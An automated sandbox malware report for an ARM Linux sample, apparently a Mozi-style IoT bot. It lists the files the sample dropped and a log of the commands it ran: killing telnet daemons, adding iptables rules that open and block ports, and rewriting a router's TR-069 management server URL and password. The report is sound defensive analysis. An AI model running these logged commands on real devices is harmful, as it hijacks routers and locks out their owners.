IOCReport

loading gif

Files

File Path
Type
Category
Malicious
nT7K5GG5km
ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
initial sample
 malicious
/etc/init.d/S95baby.sh
POSIX shell script, ASCII text executable
dropped
 malicious
/etc/init.d/bootmisc.sh
ASCII text
dropped
 malicious
/etc/init.d/checkfs.sh
ASCII text
dropped
 malicious
/etc/init.d/checkroot-bootclean.sh
ASCII text
dropped
 malicious
/etc/init.d/checkroot.sh
ASCII text
dropped
 malicious
/etc/init.d/hostname.sh
ASCII text
dropped
 malicious
/etc/init.d/hwclock.sh
ASCII text
dropped
 malicious
/etc/init.d/mountall-bootclean.sh
ASCII text
dropped
 malicious
/etc/init.d/mountall.sh
ASCII text
dropped
 malicious
/etc/init.d/mountdevsubfs.sh
ASCII text
dropped
 malicious
/etc/init.d/mountkernfs.sh
ASCII text
dropped
 malicious
/etc/init.d/mountnfs-bootclean.sh
ASCII text
dropped
 malicious
/etc/init.d/mountnfs.sh
ASCII text
dropped
 malicious
/etc/init.d/umountnfs.sh
ASCII text
dropped
 malicious
/etc/profile.d/Z97-byobu.sh
ASCII text
dropped
 malicious
/etc/profile.d/apps-bin-path.sh
ASCII text
dropped
 malicious
/etc/profile.d/bash_completion.sh
ASCII text
dropped
 malicious
/etc/profile.d/cedilla-portuguese.sh
ASCII text
dropped
 malicious
/etc/profile.d/vte-2.91.sh
ASCII text
dropped
 malicious
/etc/rc.local
ASCII text
dropped
 malicious
/etc/rcS.d/S95baby.sh
POSIX shell script, ASCII text executable
dropped
 malicious
/usr/bin/gettext.sh
ASCII text
dropped
 malicious
/usr/networks
ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
dropped
 malicious
/usr/sbin/alsa-info.sh
ASCII text, with very long lines
dropped
 malicious
/boot/grub/i386-pc/modinfo.sh
ASCII text
dropped
 clean
/etc/acpi/asus-keyboard-backlight.sh
ASCII text
dropped
 clean
/etc/acpi/asus-wireless.sh
ASCII text
dropped
 clean
/etc/acpi/ibm-wireless.sh
ASCII text
dropped
 clean
/etc/acpi/powerbtn.sh
ASCII text
dropped
 clean
/etc/acpi/tosh-wireless.sh
ASCII text
dropped
 clean
/etc/acpi/undock.sh
ASCII text
dropped
 clean
/etc/bash_completion.d/libreoffice.sh
ASCII text
dropped
 clean
/etc/wpa_supplicant/action_wpa.sh
ASCII text
dropped
 clean
/etc/wpa_supplicant/functions.sh
ASCII text
dropped
 clean
/etc/wpa_supplicant/ifupdown.sh
ASCII text
dropped
 clean
/tmp/.config
ASCII text
dropped
 clean
/usr/share/alsa-base/alsa-info.sh
ASCII text, with very long lines
dropped
 clean
/usr/share/alsa/utils.sh
ASCII text
dropped
 clean
/usr/share/brltty/initramfs/brltty.sh
ASCII text
dropped
 clean
/usr/share/cups/braille/cups-braille.sh
UTF-8 Unicode text
dropped
 clean
/usr/share/cups/braille/index.sh
ASCII text
dropped
 clean
/usr/share/cups/braille/indexv3.sh
ASCII text
dropped
 clean
/usr/share/cups/braille/indexv4.sh
ASCII text
dropped
 clean
/usr/share/debconf/confmodule.sh
ASCII text
dropped
 clean
/usr/share/doc/acpid/examples/ac.sh
ASCII text
dropped
 clean
/usr/share/doc/acpid/examples/default.sh
ASCII text
dropped
 clean
/usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh
ASCII text
dropped
 clean
/usr/share/doc/cron/examples/cron-tasks-review.sh
ASCII text
dropped
 clean
/usr/share/doc/gawk/examples/network/PostAgent.sh
ASCII text
dropped
 clean
/usr/share/doc/gawk/examples/prog/igawk.sh
awk or perl script, ASCII text
dropped
 clean
/usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh
ASCII text
dropped
 clean
/usr/share/doc/gdb/contrib/ari/gdb_find.sh
ASCII text
dropped
 clean
/usr/share/doc/gdb/contrib/expect-read1.sh
ASCII text
dropped
 clean
/usr/share/doc/gdb/contrib/gdb-add-index.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/convert-grafts-to-replace-refs.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-am.sh
OS/2 REXX batch file, ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-checkout.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-clean.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-clone.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-commit.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-fetch.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-gc.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-log.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-ls-remote.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-merge-ours.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-merge.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-notes.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-pull.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-repack.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-reset.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-resolve.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-revert.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-tag.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-verify-tag.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-whatchanged.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/fast-import/git-import.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/git-resurrect.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/remotes2config.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/rerere-train.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/subtree/git-subtree.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh
ASCII text
dropped
 clean
/usr/share/doc/hddtemp/contribs/analyze/graph-field.sh
ASCII text
dropped
 clean
/usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh
ASCII text
dropped
 clean
/usr/share/doc/hddtemp/contribs/hddtemp-all.sh
ASCII text
dropped
 clean
/usr/share/doc/ifupdown/examples/check-mac-address.sh
ASCII text
dropped
 clean
/usr/share/doc/ifupdown/examples/get-mac-address.sh
ASCII text
dropped
 clean
/usr/share/doc/ifupdown/examples/pcmcia-compat.sh
ASCII text
dropped
 clean
/usr/share/doc/ifupdown/examples/ping-places.sh
ASCII text
dropped
 clean
/usr/share/doc/lm-sensors/examples/daemon/healthd.sh
ASCII text
dropped
 clean
/usr/share/doc/lm-sensors/examples/tellerstats/gather.sh
ASCII text
dropped
 clean
/usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh
ASCII text
dropped
 clean
/usr/share/doc/mdadm/examples/mdadd.sh
ASCII text
dropped
 clean
/usr/share/doc/netcat-openbsd/examples/dist.sh
ASCII text
dropped
 clean
/usr/share/doc/popularity-contest/examples/bin/popcon-process.sh
ASCII text
dropped
 clean
/usr/share/doc/tmux/examples/bash_completion_tmux.sh
ASCII text
dropped
 clean
/usr/share/doc/toshset/toshiba-acpi/2.6.26/install.sh
ASCII text
dropped
 clean
/usr/share/doc/toshset/toshiba-acpi/2.6.28/install.sh
ASCII text
dropped
 clean
/usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh
ASCII text
dropped
 clean
/usr/share/doc/xdotool/examples/ffsp.sh
ASCII text
dropped
 clean
/usr/share/hplip/hplip_clean.sh
ASCII text
dropped
 clean
/usr/share/keyutils/request-key-debug.sh
ASCII text
dropped
 clean
/usr/share/lightdm/guest-session/setup.sh
ASCII text
dropped
 clean
/usr/share/os-prober/common.sh
ASCII text
dropped
 clean
/usr/share/vim/vim74/macros/less.sh
ASCII text
dropped
 clean
/usr/share/xscreensaver/xscreensaver-wrapper.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/Documentation/aoe/autoload.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/Documentation/aoe/status.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/Documentation/aoe/udev-install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/Documentation/features/list-arch.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/Documentation/s390/config3270.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/arm/boot/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/arm64/boot/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/arm64/kernel/vdso/gen_vdso_offsets.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/blackfin/boot/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/ia64/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/m32r/boot/compressed/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/m68k/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/mn10300/boot/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/nios2/boot/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/parisc/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/powerpc/boot/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/powerpc/kernel/prom_init_check.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/powerpc/kernel/systbl_chk.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/powerpc/relocs_check.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/s390/boot/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/sh/boot/compressed/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/sparc/boot/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/x86/boot/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/x86/entry/vdso/checkundef.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/x86/kernel/cpu/mkcapflags.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/x86/tools/calc_run_size.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/x86/um/vdso/checkundef.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/functions.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/parameters.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/pktgen_bench_xmit_mode_netif_receive.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/pktgen_sample01_simple.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/pktgen_sample02_multiqueue.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/pktgen_sample03_burst_single_flow.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/check_extable.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/checksyscalls.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/decode_stacktrace.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/depmod.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/dtc/update-dtc-source.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/gcc-goto.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/gcc-version.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/gcc-x86_32-has-stack-protector.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/gcc-x86_64-has-stack-protector.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/gen_initramfs_list.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/headers.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/headers_install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/kconfig/check.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/kconfig/lxdialog/check-lxdialog.sh
C source, ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/kconfig/merge_config.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/ld-version.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/link-vmlinux.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/mkuboot.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/selinux/install_policy.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/tags.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/xen-hypercalls.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/xz_wrap.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/spl/autogen.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/spl/scripts/check.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/build/tests/run.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/hv/bondvf.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/hv/hv_get_dhcp_info.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/hv/hv_get_dns_info.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/hv/hv_set_ifconfig.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/nfsd/inject_fault.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/perf/arch/x86/tests/gen-insn-x86-dat.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/perf/perf-archive.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/perf/perf-completion.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/perf/perf-with-kcore.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/perf/util/generate-cmdlist.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/power/cpupower/bench/cpufreq-bench_plot.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/power/cpupower/bench/cpufreq-bench_script.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/power/cpupower/utils/version-gen.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/fault-injection/failcmd.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/cpu-hotplug/cpu-on-off-test.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/efivarfs/efivarfs.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/firmware/fw_filesystem.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/firmware/fw_userhelper.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/futex/functional/run.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/futex/run.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/gen_kselftest_tar.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/kselftest_install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/memfd/run_fuse_test.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/memory-hotplug/mem-on-off-test.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/net/test_bpf.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/config2frag.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/configNR_CPUS.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/configcheck.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/configinit.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/cpus2use.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/functions.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm-build.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm-recheck-lock.sh
awk or perl script, ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm-recheck-rcu.sh
awk or perl script, ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm-recheck.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm-test-1-run.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm.sh
awk or perl script, ASCII text, with very long lines
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/parse-build.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/parse-console.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/parse-torture.sh
awk or perl script, ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/configs/lock/ver_functions.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/configs/rcu/ver_functions.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/static_keys/test_static_keys.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/user/test_user_copy.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/x86/check_cc.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/zram/zram.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/zram/zram01.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/zram/zram02.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/zram/zram_lib.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/time/udelay_test.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/usb/hcd-tests.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/usb/usbip/autogen.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/usb/usbip/cleanup.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/vm/slabinfo-gnuplot.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/zfs/autogen.sh
ASCII text
dropped
 clean
/var/crash/_usr_share_apport_apport-checkreports.1000.crash
ASCII text
dropped
 clean
/var/crash/_usr_share_apport_apport-gtk.1000.crash
ASCII text
dropped
 clean
There are 212 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
/tmp/nT7K5GG5km
/usr/bin/qemu-arm /tmp/nT7K5GG5km
 clean
/tmp/nT7K5GG5km
n/a
 clean
/tmp/nT7K5GG5km
n/a
 clean
/tmp/nT7K5GG5km
n/a
 clean
/bin/sh
/bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
 clean
/bin/sh
n/a
 clean
/usr/bin/killall
killall -9 telnetd utelnetd scfgmgr
 clean
/tmp/nT7K5GG5km
n/a
 clean
/tmp/nT7K5GG5km
n/a
 clean
/tmp/nT7K5GG5km
n/a
 clean
/tmp/nT7K5GG5km
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --destination-port 44040 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I INPUT -p tcp --destination-port 44040 -j ACCEPT
 clean
/sbin/iptables
n/a
 clean
/sbin/modprobe
/sbin/modprobe ip_tables
 clean
/tmp/nT7K5GG5km
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 44040 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I OUTPUT -p tcp --source-port 44040 -j ACCEPT
 clean
/tmp/nT7K5GG5km
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 44040 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I PREROUTING -t nat -p tcp --destination-port 44040 -j ACCEPT
 clean
/tmp/nT7K5GG5km
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 44040 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I POSTROUTING -t nat -p tcp --source-port 44040 -j ACCEPT
 clean
/tmp/nT7K5GG5km
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --dport 44040 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I INPUT -p tcp --dport 44040 -j ACCEPT
 clean
/tmp/nT7K5GG5km
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --sport 44040 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I OUTPUT -p tcp --sport 44040 -j ACCEPT
 clean
/tmp/nT7K5GG5km
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 44040 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I PREROUTING -t nat -p tcp --dport 44040 -j ACCEPT
 clean
/tmp/nT7K5GG5km
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 44040 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I POSTROUTING -t nat -p tcp --sport 44040 -j ACCEPT
 clean
/tmp/nT7K5GG5km
n/a
 clean
/tmp/nT7K5GG5km
n/a
 clean
/tmp/nT7K5GG5km
n/a
 clean
/tmp/nT7K5GG5km
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I INPUT -p tcp --destination-port 58000 -j DROP
 clean
/tmp/nT7K5GG5km
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
 clean
/tmp/nT7K5GG5km
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I INPUT -p tcp --dport 58000 -j DROP
 clean
/tmp/nT7K5GG5km
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I OUTPUT -p tcp --sport 58000 -j DROP
 clean
/tmp/nT7K5GG5km
n/a
 clean
/bin/sh
/bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
 clean
/tmp/nT7K5GG5km
n/a
 clean
/bin/sh
/bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
 clean
/tmp/nT7K5GG5km
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I INPUT -p tcp --destination-port 35000 -j DROP
 clean
/tmp/nT7K5GG5km
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I INPUT -p tcp --destination-port 50023 -j DROP
 clean
/tmp/nT7K5GG5km
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
 clean
/tmp/nT7K5GG5km
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
 clean
/tmp/nT7K5GG5km
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I INPUT -p tcp --destination-port 7547 -j DROP
 clean
/tmp/nT7K5GG5km
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
 clean
/tmp/nT7K5GG5km
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I INPUT -p tcp --dport 35000 -j DROP
 clean
/tmp/nT7K5GG5km
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I INPUT -p tcp --dport 50023 -j DROP
 clean
/tmp/nT7K5GG5km
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I OUTPUT -p tcp --sport 50023 -j DROP
 clean
/tmp/nT7K5GG5km
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I OUTPUT -p tcp --sport 35000 -j DROP
 clean
/tmp/nT7K5GG5km
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I INPUT -p tcp --dport 7547 -j DROP
 clean
/tmp/nT7K5GG5km
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I OUTPUT -p tcp --sport 7547 -j DROP
 clean
/tmp/nT7K5GG5km
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p udp --destination-port 8080 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I INPUT -p udp --destination-port 8080 -j ACCEPT
 clean
/tmp/nT7K5GG5km
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p udp --source-port 8080 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I OUTPUT -p udp --source-port 8080 -j ACCEPT
 clean
/tmp/nT7K5GG5km
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 8080 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I PREROUTING -t nat -p udp --destination-port 8080 -j ACCEPT
 clean
/tmp/nT7K5GG5km
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 8080 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I POSTROUTING -t nat -p udp --source-port 8080 -j ACCEPT
 clean
/tmp/nT7K5GG5km
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p udp --dport 8080 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I INPUT -p udp --dport 8080 -j ACCEPT
 clean
/tmp/nT7K5GG5km
n/a
 clean
/bin/sh
